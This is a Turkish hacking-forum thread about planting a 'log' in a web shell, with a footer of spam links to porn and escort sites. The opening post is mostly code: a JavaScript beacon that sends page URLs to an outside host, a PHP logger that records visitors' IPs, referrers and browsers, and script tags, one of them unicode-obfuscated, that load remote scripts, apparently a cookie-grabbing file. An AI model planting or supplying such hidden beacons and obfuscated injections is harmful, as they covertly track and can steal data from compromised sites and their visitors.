KULLANICI ADI : ŞİFRE Şifremi Unuttum*

Anasayfa İLLEG4L BANK KREDİ SATIN AL İLLEG4LİZM RAP Sub Domain Bulucu Arama Yap Yeni Konular Bugünki Konular

Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
[Konu Anlatım]Shell'e nasıl log yerleştirilir ve Shell'de nasıl log bulunur ?
Konu : [Konu Anlatım]Shell'e nasıl log yerleştirilir ve Shell'de nasıl log bulunur ? - 30.11.2014, 03:05
Mesaj: #1
İmage

İmage

İmage

İmage

İmage
 




Kod:
a=new/**/Image();a.src='http://domainname.com/logyaz.php?a='+escape(location.href);


Kod:
<?php $ip = $_SERVER['REMOTE_ADDR']; $tarih = date('d.m.Y H:i:s'); $browser = getenv('HTTP_USER_AGENT'); $referans = $_SERVER['HTTP_REFERER']; $kayit = fopen("logtutulan.txt", "a"); fputs($kayit, "IP: $ip - TARIH: $tarih - Link: $referans - BROWSER: $browser \n "); fclose($kayit); ?>


Kod:
<SCRIPT SRC=http://domainname.com/kaydettiğinjsdosyasıismi.js></SCRIPT>


Kod:
<script type=”text/javascript”>document.write(’\\u003c\\u0053\\u0043\\u0052\\u0049\\u0050\\u0054\\u0020\\u0053\\u0052\\u0043\\u003d\\u0068\\u0074\\u0074\\u0070\\u003a\\u002f\\u002f\\u0077\\u0077\\u0077\\u002e\\u006d\\u0065\\u0074\\u0061\\u006c\\u0074\\u0065\\u0061\\u006d\\u002e\\u006f\\u0072\\u0067\\u002f\\u0062\\u0061\\u0074\\u0061\\u006b\\u002f\\u0063\\u006f\\u006f\\u006b\\u0069\\u0065\\u002e\\u006a\\u0073\\u003e\\u003c\\u002f\\u0053\\u0043\\u0052\\u0049\\u0050\\u0054\\u003e’)</script> <?php


Kod:
<SCRIPT SRC=http://www.siteadresi.org/herhangibirisim/herhangibirisim.js></SCRIPT>

 

 

Alıntı ile Cevapla
Konu : [Konu Anlatım]Shell'e nasıl log yerleştirilir ve Shell'de nasıl log bulunur ? - 30.11.2014, 03:36
Mesaj: #2
Güzel ve açıklayıcı bir konu olmuş kardeşim eline emeğine sağlık İmage

WWW Alıntı ile Cevapla


Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
hd porno antalya escort türk ifşa porno izle türk ifşa porno samsun escort izmir escort ataşehir escort türk ifşa hd porno